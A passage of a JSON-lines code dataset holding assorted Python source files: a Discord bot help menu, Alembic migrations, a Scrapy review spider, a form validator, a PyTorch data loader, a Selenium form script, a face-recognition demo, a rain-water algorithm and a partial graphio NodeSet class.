style=ButtonStyle.green,\n label=\"Select\",\n custom_id=\"select\"\n )\n )\n button_row_2 = ActionRow(\n Button(\n style=ButtonStyle.blurple,\n emoji=\"⬇\",\n custom_id=\"down\"\n ),\n Button(\n style=ButtonStyle.red,\n label=\"Back\",\n custom_id=\"back\"\n )\n )\n # Send a message with buttons\n emb = discord.Embed(\n title=menu.header,\n description=f\"{menu.long_desc}\\n\\n{menu.display_elements()}\"\n )\n msg = await ctx.send(embed=emb, components=[button_row_1, button_row_2])\n\n # Click manager usage\n\n on_click = msg.create_click_listener(timeout=60)\n\n @on_click.matching_id(\"down\")\n async def down(inter):\n menu.next_elem()\n\n @on_click.matching_id(\"up\")\n async def up(inter):\n menu.prev_elem()\n\n @on_click.matching_id(\"select\")\n async def select(inter):\n nonlocal menu\n menu = menu.element\n\n @on_click.matching_id(\"back\")\n async def back(inter):\n nonlocal menu\n menu = menu.parent\n\n @on_click.no_checks()\n async def response(inter):\n emb.title = menu.header\n emb.description = f\"{menu.long_desc}\\n\\n{menu.display_elements()}\"\n await inter.reply(embed=emb, type=ResponseType.UpdateMessage)\n\n @on_click.timeout\n async def on_timeout():\n for button in button_row_1.components:\n button.disabled = True\n for button in button_row_2.components:\n button.disabled = True\n await msg.edit(embed=emb, components=[button_row_1, button_row_2])\n\n\nclass Help(commands.Cog):\n \n def __init__(self, bot):\n self.bot = bot\n\n @slash_commands.command(name='music-help',\n description='Provides information on how to use the music commands. 
', \n testing_guilds=guilds)\n async def cmd_music_help(self, ctx:SlashInteraction):\n menu = Element(\n header=\"Music commands\",\n long_desc=\"Navigate through all the entries\",\n elements=[\n Element(\n header=\"/connect \",\n long_desc=\"Connects the bot to a channel and creates a player.\\n\"\n \"This command is automatically executed if you are not in a channel.\"\n ),\n Element(\n header=\"/play \",\n long_desc=\"Starts playing a song in the currently connected channel.\\n\"\n \"If you are not in a channel, it will automatically connect.\\n\\n\"\n \"This command supports playing from youtube, bandcamp, soundcloud, twitch, vimeo and direct http streams.\"\n ),\n Element(\n header=\"/pause\",\n long_desc=\"Pauses playback. \"\n ),\n Element(\n header=\"/resume\",\n long_desc=\"Resumes playback. \"\n ),\n Element(\n header=\"/skip\",\n long_desc=\"Skips the currently playing song. \"\n ),\n Element(\n header=\"/volume\",\n long_desc=\"Sets the volume of the player. \"\n ),\n Element(\n header=\"/now_playing\",\n long_desc=\"Displays the currently playing song. \"\n ),\n Element(\n header=\"/queue\",\n long_desc=\"Displays the queue of the player. \"\n ),\n Element(\n header=\"/stop\",\n long_desc=\"Stops playback. \"\n ),\n Element(\n header=\"/nodes\",\n long_desc=\"Displays information about the connected nodes. \"\n )\n ]\n )\n create_menu(ctx, menu)\n\ndef setup(bot):\n bot.add_cog(Help(bot))\n","sub_path":"cogs/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"604677732","text":"\"\"\"empty message\n\nRevision ID: 553736fc1724\nRevises: a9f4f67bb099\nCreate Date: 2018-07-14 00:36:56.675417\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '553736fc1724'\ndown_revision = 'a9f4f67bb099'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_tags_name', table_name='tags')\n op.drop_table('article_tag')\n op.drop_table('tags')\n op.add_column('articles', sa.Column('tags', sa.String(length=120), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('articles', 'tags')\n op.create_table('tags',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('utc_created', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),\n sa.Column('utc_updated', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),\n sa.Column('name', sa.VARCHAR(length=20), autoincrement=False, nullable=False),\n sa.Column('is_enable', sa.BOOLEAN(), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('id', name='tags_pkey')\n )\n op.create_table('article_tag',\n sa.Column('article_id', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.Column('tag_id', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.ForeignKeyConstraint(['article_id'], ['articles.id'], name='article_tag_article_id_fkey'),\n sa.ForeignKeyConstraint(['tag_id'], ['tags.id'], name='article_tag_tag_id_fkey')\n )\n op.create_index('ix_tags_name', 'tags', ['name'], unique=True)\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/553736fc1724_.py","file_name":"553736fc1724_.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"294867740","text":"# -*- coding: utf8 -*-\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\n\nTEST_SCALE = 100\n\n\nclass Digitalt_tvSpider(AlaSpider):\n name = 'digitalt_tv'\n allowed_domains = ['digitalt.tv']\n start_urls = ['https://digitalt.tv/kategori/anmeldelser/']\n\n def parse(self, response):\n review_urls_xpath = \"//h3[@class='post-title']/a/@href\"\n review_urls = self.extract_list(response.xpath(review_urls_xpath))\n next_page_xpath = \"//a[@rel='next']/@href\"\n\n for review_url in review_urls:\n yield response.follow(review_url,\n callback=self.parse_review_product)\n\n next_page = self.extract(response.xpath(next_page_xpath))\n if next_page:\n yield response.follow(next_page,\n callback=self.parse)\n\n def parse_review_product(self, response):\n product = self.parse_product(response)\n review = self.parse_review(response)\n yield product\n yield review\n\n def get_product_name(self, response):\n name_xpath = \"//meta[@property='og:title']/@content\"\n name_ = self.extract(response.xpath(name_xpath))\n name = name_.split(u'–')\n if name[0]:\n productname = name[0].replace(\n 'Test: ', '').replace('Test', '').replace('test', '')\n else:\n productname = name_xpath.replace('Test', '').replace('test', '')\n\n return productname\n\n def parse_product(self, response):\n product_xpaths = {\n 'PicURL': '//meta[@property=\"og:image\"]/@content',\n 'OriginalCategoryName': \"//meta[@property='article:section']\"\n \"/@content\",\n 'ProductManufacturer': \"//meta[@property='article:tag']/@content\",\n 'source_internal_id': \"substring-after(\"\n \"//link[@rel='shortlink']/@href, '=')\"\n }\n\n product = self.init_item_by_xpaths(response, 'product', product_xpaths)\n product[\"ProductName\"] = self.get_product_name(response)\n\n return product\n\n def parse_review(self, response):\n review_xpaths = {\n 'TestTitle': '//meta[@property=\"og:title\"]/@content',\n 'source_internal_id': \"substring-after(\"\n \"//link[@rel='shortlink']/@href, '=')\",\n 'Author': \"//a[@rel='author']/text()\",\n \"SourceTestRating\": \"//span[@property='ratingValue']/text()\",\n \"TestDateText\": \"substring-before(\"\n \"//meta[@property='article:published_time']/@content,'T')\",\n 'TestSummary': '//meta[@property=\"og:description\"]/@content',\n 'TestPros': \"//div[@class='rwp-pros']/li/text()|\"\n 
\"//p[@class='plus']/text()|\"\n \"//div[@class='rwp-pros']/p/text()\",\n 'TestCons': \"//div[@class='rwp-cons']/li/text()|\"\n \"//p[@class='minus']/text()|//div[@class='rwp-cons']/p/text()\"\n }\n\n review = self.init_item_by_xpaths(response, 'review', review_xpaths)\n\n if review[\"SourceTestRating\"]:\n review[\"SourceTestScale\"] = TEST_SCALE\n\n if review[\"TestPros\"]:\n review[\"TestPros\"] = review[\"TestPros\"].replace('+', '')\n\n if review[\"TestCons\"]:\n review[\"TestCons\"] = review[\"TestCons\"].replace(u'–', '')\n\n review['DBaseCategoryName'] = 'PRO'\n review[\"ProductName\"] = self.get_product_name(response)\n\n return review\n","sub_path":"alascrapy/spiders/digitalt_tv.py","file_name":"digitalt_tv.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"572257233","text":"# -*- coding: UTF-8 -*-\n#\n# The MIT License\n# \n# Copyright (c) 2012 Felix Schwarz \n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom pycerberus.api import Validator\nfrom pycerberus.i18n import _\n\n\n__all__ = ['MatchingFields']\n\nclass MatchingFields(Validator):\n \n def __init__(self, first_field, second_field, *args, **kwargs):\n self.first_field = first_field\n self.second_field = second_field\n self.super.__init__(*args, **kwargs)\n \n def messages(self):\n return dict(mismatch=_(u'Fields do not match'))\n \n def validate(self, values, context):\n first = values[self.first_field]\n second = values[self.second_field]\n if first != second:\n error = self.exception('mismatch', second, context)\n error_dict = {self.second_field: error}\n self.raise_error('mismatch', values, context, error_dict=error_dict)\n","sub_path":"pycerberus/validators/matching_fields.py","file_name":"matching_fields.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"391832586","text":"from torch.utils.data import DataLoader\nfrom torchvision import transforms, datasets\nfrom config import train_data_dir, test_data_dir, batch_size\n\nnorm_mean = [0.5, 0.5, 0.5]\nnorm_std = [0.3, 0.3, 0.3]\n\ntrain_transform = transforms.Compose([\n transforms.Pad((0, 64), fill=0),\n transforms.Resize(224),\n transforms.RandomRotation(15),\n transforms.RandomHorizontalFlip(0.5),\n transforms.RandomVerticalFlip(0.5),\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std)\n])\ntest_transform = transforms.Compose([\n transforms.Pad((0, 64), fill=0),\n transforms.Resize(224),\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std)\n])\n\ntrain_set = datasets.ImageFolder(root=train_data_dir, transform=train_transform)\ntrain_loader = DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True)\n\ntest_set = datasets.ImageFolder(root=test_data_dir, transform=test_transform)\ntest_loader = DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True)\n\nclasses = train_set.classes\nclasses_to_idx = train_set.class_to_idx\n\n\nif __name__ == '__main__':\n print('Num train_set: ', len(train_set))\n print(classes)\n print(classes_to_idx)\n","sub_path":"garbage-classification/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"301315549","text":"from selenium import webdriver\nimport math\nimport time\n\nlink = \"http://suninjuly.github.io/get_attribute.html\"\n\n\ndef calc(x):\n return str(math.log(abs(12 * math.sin(int(x)))))\n\n\ntry:\n # запускаем браузер\n browser = webdriver.Chrome()\n browser.get(link)\n\n # ищем значение Х и подставляем в формулу + записываем это значение в переменную У\n x_element = browser.find_element_by_id(\"treasure\")\n x = x_element.get_attribute(\"valuex\")\n y = calc(x)\n\n # ищем поле и вводим значение\n input1 = browser.find_element_by_id(\"answer\")\n input1.send_keys(y)\n\n # Отмечаем checkbox \"I'm the robot\"\n input2 = browser.find_element_by_id(\"robotCheckbox\")\n input2.click()\n\n # Выбираем radiobutton \"Robots rule!\"\n input3 = browser.find_element_by_id(\"robotsRule\")\n input3.click()\n\n # Нажимаем на кнопку Submit.\n button = browser.find_element_by_css_selector(\".btn\")\n 
button.click()\n\n\nfinally:\n # ожидание чтобы визуально оценить результаты прохождения скрипта\n time.sleep(15)\n # закрываем браузер после всех манипуляций\n browser.quit()","sub_path":"lesson2.1_step7.py","file_name":"lesson2.1_step7.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"451873140","text":"# coding=ascii\n\"\"\"touch updated references\n\nRevision ID: 3be1ca59b931\nRevises: eb2efcd10cf\nCreate Date: 2017-10-19 14:16:12.345000\n\n\"\"\"\nfrom __future__ import unicode_literals\n\n# revision identifiers, used by Alembic.\nrevision = '3be1ca59b931'\ndown_revision = u'eb2efcd10cf'\n\nimport datetime\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n# cf. 351dc2c86238dae5cfe85c3faa4dcc3e2bd7a651 (183a783fc885_fix_references.py)\n\nIDS = [\n 'Arnasonar-1980',\n 'Buenrostros-1991',\n 'Muller-1858',\n 'Camargo-Bigot-1992',\n 'Kuzmenkov-et-al-2007',\n]\n\nUPDATED = datetime.datetime(2017, 10, 18, 17, 00)\n\n\ndef upgrade():\n source = sa.table('source', sa.column('id'), sa.column('updated', sa.DateTime))\n dt = sa.bindparam('dt', UPDATED)\n touch = sa.update(source, bind=op.get_bind())\\\n .where(source.c.id == sa.bindparam('id_'))\\\n .where(source.c.updated < dt)\\\n .values(updated=dt)\n\n for id_ in IDS:\n touch.execute(id_=id_)\n\n\ndef downgrade():\n pass\n","sub_path":"migrations/versions/3be1ca59b931_touch_updated_references.py","file_name":"3be1ca59b931_touch_updated_references.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"75015130","text":"# Import required modules\nimport cv2 as cv\nimport numpy as np\nimport argparse\nimport time\nimport face_recognition\nimport pickle\nfrom utils.realsense import realsense, rsOptions\nfrom utils.argument import str2bool\nfrom utils.save import saveResult\nfrom utils.draw import drawRecognition\nfrom utils.faceMatch import faceMatch\n\n############ Add argument parser for command line arguments ############\nparser = argparse.ArgumentParser(\n description=\"Face recognition demo with OpenCV, dlib and face_recognition libraries.\"\n)\nparser.add_argument(\n \"--scale\", type=float, default=0.5, help=\"scale factor of input image pre-resize.\"\n)\nparser.add_argument(\n \"--threshold\",\n type=float,\n default=0.6,\n help=\"distance threshold for face recognition.\",\n)\nparser.add_argument(\n \"--pickle\",\n type=str,\n default=\"./pickle/face.pickle\",\n help=\"path to input pickle of faces\",\n)\nparser.add_argument(\n \"--skip\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=False,\n help=\"Toggle of process face detection frame by frame.\",\n)\nparser.add_argument(\n \"--info\",\n type=str2bool,\n nargs=\"?\",\n const=True,\n default=False,\n help=\"Toggle of display information in images.\",\n)\nargs = parser.parse_args()\n\n\ndef main():\n # load learned faces\n print(\"[INFO] loading faces ...\")\n # check the image source comes from\n print(\"[INFO] faces loaded from {} ...\".format(args.pickle))\n data = pickle.loads(open(args.pickle, \"rb\").read())\n\n # Initialize some variables\n face_locations = []\n process_this_frame = True\n flagCapture = False\n\n # Create a new named window\n kWinName = \"Face recognition demo\"\n\n # Start RealSense Camera\n options = rsOptions()\n options.enableColor = True\n options.resColor = [1280, 720]\n rs = realsense(options)\n rs.deviceInitial()\n\n try:\n while True:\n # Save 
program start time\n if args.skip is True:\n if process_this_frame:\n start_time = time.time()\n else:\n start_time = time.time()\n\n # Read frame\n rs.getFrame()\n frame = rs.imageColor\n if not frame.any():\n cv.waitKey()\n break\n\n # Resize frame of video to 1/2 size for faster face recognition processing\n small_frame = cv.resize(frame, (0, 0), fx=args.scale, fy=args.scale)\n\n # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)\n rgb_small_frame = small_frame[:, :, ::-1]\n\n if args.skip is True:\n # Only process every other frame of video to save time\n if process_this_frame:\n face_locations, face_names = faceMatch(\n rgb_small_frame, data, args.threshold\n )\n process_this_frame = not process_this_frame\n else:\n face_locations, face_names = faceMatch(\n rgb_small_frame, data, args.threshold\n )\n\n # Display the results\n drawRecognition(frame, face_locations, face_names, args.scale)\n\n # Calculate processing time\n if args.skip is True:\n if not process_this_frame:\n label = \"Process time: %.2f ms\" % ((time.time() - start_time) * 500)\n else:\n label = \"Process time: %.2f ms\" % ((time.time() - start_time) * 1000)\n\n # Display infomation\n if args.info is True:\n # if not process_this_frame:\n # print(\"[INFO] \" + label)\n cv.putText(\n frame, label, (0, 30), cv.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 255)\n )\n\n # Display the frame\n cv.imshow(kWinName, frame)\n\n # Process screen capture\n if flagCapture:\n print(\"[INFO] Screen captured\")\n saveResult(frame, \"recognition_rs\")\n flagCapture = False\n\n # Keyboard commands\n getKey = cv.waitKey(1) & 0xFF\n if getKey is ord(\"c\") or getKey is ord(\"C\"):\n flagCapture = True\n elif getKey is ord(\"q\") or getKey is ord(\"Q\"):\n break\n\n except Exception as e:\n print(e)\n pass\n\n finally:\n # Stop streaming\n cv.destroyAllWindows()\n rs.pipeline.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/recognition_rs.py","file_name":"recognition_rs.py","file_ext":"py","file_size_in_byte":4514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"415076842","text":"#Trapping Rain Water by Viplav Patil by own\n\ndef leftmaxx(i,arr):\n leftmax = 0\n\n if i == 0:\n leftmax = arr[i]\n return leftmax\n else:\n leftmax = max(arr[0:i+1])\n return leftmax\n\n \n\ndef rightmaxx(i,n,arr):\n rightmax = 0\n\n if i == n-1:\n rightmax = arr[i]\n return rightmax\n else:\n rightmax = max(arr[i:n])\n return rightmax\n\n\ndef water_trapping_quantity(arr,n):\n trapped_quantity = 0\n for i in range(n):\n current_num = arr[i]\n\n\n leftmax = leftmaxx(i,arr)\n rightmax = rightmaxx(i,n,arr)\n\n #print(leftmax)\n #print(rightmax)\n #print(\"\\n\")\n \n temp = min(leftmax,rightmax) - current_num\n if temp < 0:\n temp = 0\n\n trapped_quantity += temp \n #print(trapped_quantity)\n\n print(\"trapped water quantity is {}\".format(trapped_quantity))\n\n \n\n\n\n\nif __name__ == '__main__':\n arr = [3, 0, 2, 0, 4]\n water_trapping_quantity(arr,len(arr))\n\n\n'''\nhttps://www.youtube.com/watch?v=7stXjaFwOCk\n\n\nT.c = O(n-square) because everytime unordered array is scanned for each item to find either leftmax or rightmax\n\nS.C = O(1)\n\n\n\n\nhttps://www.geeksforgeeks.org/trapping-rain-water/\n\n'''","sub_path":"mycodes/arrays/p20/p20.py","file_name":"p20.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"166735054","text":"import 
logging\nfrom uuid import uuid4\nimport os\nimport json\nimport csv\nimport gzip\nfrom collections import defaultdict\n\nfrom graphio.helper import chunks, create_single_index, create_composite_index\nfrom graphio import defaults\nfrom graphio.queries import nodes_create_unwind, nodes_merge_unwind, nodes_merge_unwind_preserve, nodes_merge_unwind_array_props, \\\n nodes_merge_unwind_preserve_array_props\nfrom graphio.graph import run_query_return_results\n\nlog = logging.getLogger(__name__)\n\n# dict with python types to casting functions in Cypher\nCYPHER_TYPE_TO_FUNCTION = {int: 'toInteger',\n float: 'toFloat'}\n\n\nclass NodeSet:\n \"\"\"\n Container for a set of Nodes with the same labels and the same properties that define uniqueness.\n \"\"\"\n\n def __init__(self, labels, merge_keys=None, batch_size=None, default_props=None, preserve=None, append_props=None, indexed=False):\n \"\"\"\n\n :param labels: The labels for the nodes in this NodeSet.\n :type labels: list[str]\n :param merge_keys: The properties that define uniqueness of the nodes in this NodeSet.\n :type merge_keys: list[str]\n :param batch_size: Batch size for Neo4j operations.\n :type batch_size: int\n \"\"\"\n self.labels = labels\n self.merge_keys = merge_keys\n self.default_props = default_props\n self.preserve = preserve\n self.append_props = append_props\n self.indexed = indexed\n\n self.combined = '_'.join(sorted(self.labels)) + '_' + '_'.join(sorted(self.merge_keys))\n self.uuid = str(uuid4())\n\n if batch_size:\n self.batch_size = batch_size\n else:\n self.batch_size = defaults.BATCHSIZE\n\n self.nodes = []\n # a node index with merge_key_id -> [positions in nodes list]\n # this works for both unique and non-unique settings\n self.node_index = defaultdict(list)\n\n def __str__(self):\n return f\"\"\n\n def _merge_key_id(self, node_dict: dict) -> tuple:\n \"\"\"\n Create a FrozenSet from an ordered list of the merge_key properties for a node.\n\n :param node_dict: A node dict.\n :return:\n \"\"\"\n return tuple([node_dict[key] for key in self.merge_keys])\n\n def add_node(self, properties):\n \"\"\"\n Create a node in this NodeSet.\n\n :param properties: Node properties.\n :type properties: dict\n \"\"\"\n if self.default_props:\n node_props = {**self.default_props, **properties}\n else:\n node_props = properties\n\n self.nodes.append(node_props)\n\n if self.indexed:\n self.node_index[self._merge_key_id(properties)].append(len(self.nodes) - 1)\n\n def add_nodes(self, list_of_properties):\n for properties in list_of_properties:\n self.add_node(properties)\n\n def update_node(self, properties: dict):\n \"\"\"\n Update an existing node by overwriting all properties.\n\n Note that this requires `NodeSet(..., indexed=True)` which is not the default!\n\n :param properties: Node property dictionary.\n \"\"\"\n if not self.indexed:\n raise TypeError(\"Update only works on an indexed NodeSet.\")\n\n node_merge_key_id = self._merge_key_id(properties)\n if node_merge_key_id in self.node_index:\n # this function should work for single and multiple nodes\n for node_list_index in self.node_index[node_merge_key_id]:\n self.nodes[node_list_index].update(properties)\n # if the node does not exist it is created\n else:\n self.add_node(properties)\n\n def add_unique(self, properties):\n \"\"\"\n Add a node to this NodeSet only if a node with the same `merge_keys` does not exist yet.\n\n Note: Right now this function iterates all nodes in the NodeSet. This is of course slow for large\n numbers of nodes. 
A better solution would be to create an 'index' as is done for RelationshipSet.\n\n :param properties: Node properties.\n :type properties: dict\n \"\"\"\n\n compare_values = frozenset([properties[key] for key in self.merge_keys])\n\n for other_node_properties in self.node_properties():\n this_values = frozenset([other_node_properties[key] for key in self.merge_keys])\n if this_values == compare_values:\n return None\n\n # add node if not found\n self.add_node(properties)\n\n def to_dict(self):\n \"\"\"\n Create dictionary defining the nodeset.\n \"\"\"\n return {\"labels\": self.labels, \"merge_keys\": self.merge_keys, \"nodes\": self.nodes}\n\n @classmethod\n def from_dict(cls, nodeset_dict, batch_size=None):\n ns = cls(labels=nodeset_dict[\"labels\"], merge_keys=nodeset_dict[\"merge_keys\"])\n ns.add_nodes(nodeset_dict[\"nodes\"])\n return ns\n\n def to_csv(self, filepath: str, filename: str = None, quoting: int = None) -> str:\n \"\"\"\n Create a CSV file for this nodeset.\n\n :param filepath: Path where the file is stored.\n :param filename: Optional filename. A filename will be autocreated if not passed.\n :param quoting: Optional quoting setting for csv writer (any of csv.QUOTE_MINIMAL, csv.QUOTE_NONE, csv.QUOTE_ALL etc).\n \"\"\"\n if not filename:\n filename = f\"{self.object_file_name()}.csv\"\n if not quoting:\n quoting = csv.QUOTE_MINIMAL\n\n csv_file_path = os.path.join(filepath, filename)\n\n log.debug(f\"Create CSV file {csv_file_path}\")\n\n all_props = self.all_properties_in_nodeset()\n\n with open(csv_file_path, 'w', newline='') as csvfile:\n fieldnames = list(all_props)\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, quoting=quoting)\n\n writer.writeheader()\n\n for n in self.nodes:\n writer.writerow(dict(n))\n\n return csv_file_path\n\n def create_csv_query(self, filename: str = None, periodic_commit=1000):\n\n # get types\n property_types = self._estimate_type_of_property_values()\n\n if not filename:\n filename = f\"{self.object_file_name()}.csv\"\n\n q = \"USING PERIODIC COMMIT {}\\n\".format(periodic_commit)\n q += \"LOAD CSV WITH HEADERS FROM 'file:///{}' AS line\\n\".format(filename)\n q += \"CREATE (n:{})\\n\".format(':'.join(self.labels))\n\n props_list = []\n for k in sorted(self.all_properties_in_nodeset()):\n prop_type = property_types[k]\n if prop_type in CYPHER_TYPE_TO_FUNCTION:\n props_list.append(f\"n.{k} = {CYPHER_TYPE_TO_FUNCTION[prop_type]}(line.{k})\")\n else:\n props_list.append(f\"n.{k} = line.{k}\")\n\n q += \"SET {}\".format(', '.join(props_list))\n\n return q\n\n def merge_csv_query(self, filename: str = None, periodic_commit=1000):\n # get types\n property_types = self._estimate_type_of_property_values()\n\n if not filename:\n filename = f\"{self.object_file_name()}.csv\"\n\n merge_csv_query_elements = []\n for merge_key in self.merge_keys:\n prop_type = property_types[merge_key]\n if prop_type in CYPHER_TYPE_TO_FUNCTION:\n merge_csv_query_elements.append(f\"{merge_key}: {CYPHER_TYPE_TO_FUNCTION[prop_type]}(line.{merge_key})\")\n else:\n merge_csv_query_elements.append(f\"{merge_key}: line.{merge_key}\")\n merge_csv_query_string = ','.join(merge_csv_query_elements)\n\n q = \"USING PERIODIC COMMIT {}\\n\".format(periodic_commit)\n q += \"LOAD CSV WITH HEADERS FROM 'file:///{}' AS line\\n\".format(filename)\n q += f\"MERGE (n:{':'.join(self.labels)} {{ {merge_csv_query_string} }})\\n\"\n\n props_list = []\n for k in sorted(self.all_properties_in_nodeset()):\n prop_type = property_types[k]\n if prop_type in CYPHER_TYPE_TO_FUNCTION:\n 
props_list.append(f\"n.{k} = {CYPHER_TYPE_TO_FUNCTION[prop_type]}(line.{k})\")\n else:\n props_list.append(f\"n.{k} = line.{k}\")\n\n q += \"SET {}\".format(', '.join(props_list))\n\n return q\n\n\n @classmethod\n def from_csv_json_set(cls, csv_file_path, json_file_path, load_items:bool = False):\n \"\"\"\n Read the default CSV/JSON file combination.\n\n Needs paths to CSV and JSON file.\n\n :param csv_file_path: Path to the CSV file.\n :param json_file_path: Path to the JSON file.\n :param load_items: Yield items from file (False, default) or load them to memory (True).\n :return: The NodeSet.\n \"\"\"\n with open(json_file_path) as f:\n metadata = json.load(f)\n\n # Some legacy files use 'merge_keys' instead of 'mergekeys' (like the property of the\n # NodeSet constructor), check if that is true and use 'merge_keys' later.\n # Do not parameterize this in future, just safe guard against common type.\n mergekeys_json_key = 'mergekeys'\n if 'merge_keys' in metadata:\n mergekeys_json_key = 'merge_keys'\n\n # map properties\n property_map = None\n if 'property_map' in metadata:\n # replace mergekeys if necessary\n property_map = metadata['property_map']\n metadata[mergekeys_json_key] = [property_map[x] if x in property_map else x for x in metadata[mergekeys_json_key]]\n\n # NodeSet instance\n nodeset = cls(metadata['labels'], merge_keys=metadata[mergekeys_json_key])\n\n if load_items:\n nodeset.nodes = _read_nodes(csv_file_path, property_map)\n else:\n nodeset.nodes = _yield_node(csv_file_path, property_map)\n\n return nodeset\n\n\n def object_file_name(self, suffix: str = None) -> str:\n \"\"\"\n Create a unique name for this NodeSet that indicates content. Pass an optional suffix.\n NOTE: suffix has to include the '.' for a filename!\n\n `nodeset_Label_merge-key_uuid`\n\n With suffix:\n\n `nodeset_Label_merge-key_uuid.json`\n \"\"\"\n basename = f\"nodeset_{'_'.join(self.labels)}_{'_'.join(self.merge_keys)}_{self.uuid}\"\n if suffix:\n basename += suffix\n return basename\n\n def serialize(self, target_dir: str):\n \"\"\"\n Serialize NodeSet to a JSON file in a target directory.\n\n This function is meant for dumping/reloading and not to create a general transport\n format. 
The function will likely be optimized for disk space or compressed in future.\n \"\"\"\n path = os.path.join(target_dir, self.object_file_name(suffix='.json'))\n with open(path, 'wt') as f:\n json.dump(self.to_dict(), f, indent=4)\n\n def create(self, graph, database:str = None, batch_size=None):\n \"\"\"\n Create all nodes from NodeSet.\n \"\"\"\n log.debug('Create NodeSet')\n if not batch_size:\n batch_size = self.batch_size\n log.debug('Batch Size: {}'.format(batch_size))\n\n q = nodes_create_unwind(self.labels)\n\n for batch in chunks(self.nodes, size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch))\n\n def merge(self, graph, merge_properties=None, batch_size=None, preserve=None, append_props=None, database=None):\n \"\"\"\n Merge nodes from NodeSet on merge properties.\n\n :param merge_properties: The merge properties.\n \"\"\"\n # overwrite if preserve is passed\n if preserve:\n self.preserve = preserve\n # overwrite if array_props is passed\n if append_props:\n self.append_props = append_props\n\n log.debug('Merge NodeSet on {}'.format(merge_properties))\n\n if not batch_size:\n batch_size = self.batch_size\n\n if not merge_properties:\n merge_properties = self.merge_keys\n\n log.debug('Batch Size: {}'.format(batch_size))\n\n # use py2neo base functions if no properties are preserved\n if not self.preserve and not self.append_props:\n q = nodes_merge_unwind(self.labels, self.merge_keys)\n for batch in chunks(self.node_properties(), size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch))\n\n elif self.preserve and not self.append_props:\n q = nodes_merge_unwind_preserve(self.labels, self.merge_keys, property_parameter='props')\n for batch in chunks(self.node_properties(), size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch), preserve=self.preserve)\n\n elif not self.preserve and self.append_props:\n q = nodes_merge_unwind_array_props(self.labels, self.merge_keys, self.append_props,\n property_parameter='props')\n for batch in chunks(self.node_properties(), size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch), append_props=self.append_props)\n\n elif self.preserve and self.append_props:\n\n q = nodes_merge_unwind_preserve_array_props(self.labels, self.merge_keys, self.append_props, self.preserve,\n property_parameter='props')\n for batch in chunks(self.node_properties(), size=batch_size):\n run_query_return_results(graph, q, database=database, props=list(batch), append_props=self.append_props, preserve=self.preserve)\n\n def node_properties(self):\n \"\"\"\n Yield properties of the nodes in this set. Used for create function.\n \"\"\"\n for n in self.nodes:\n yield dict(n)\n\n def all_properties_in_nodeset(self):\n \"\"\"\n Return a set of all property keys in this NodeSet\n\n :return: A set of unique property keys of a NodeSet\n \"\"\"\n all_props = set()\n\n # collect properties\n for props in 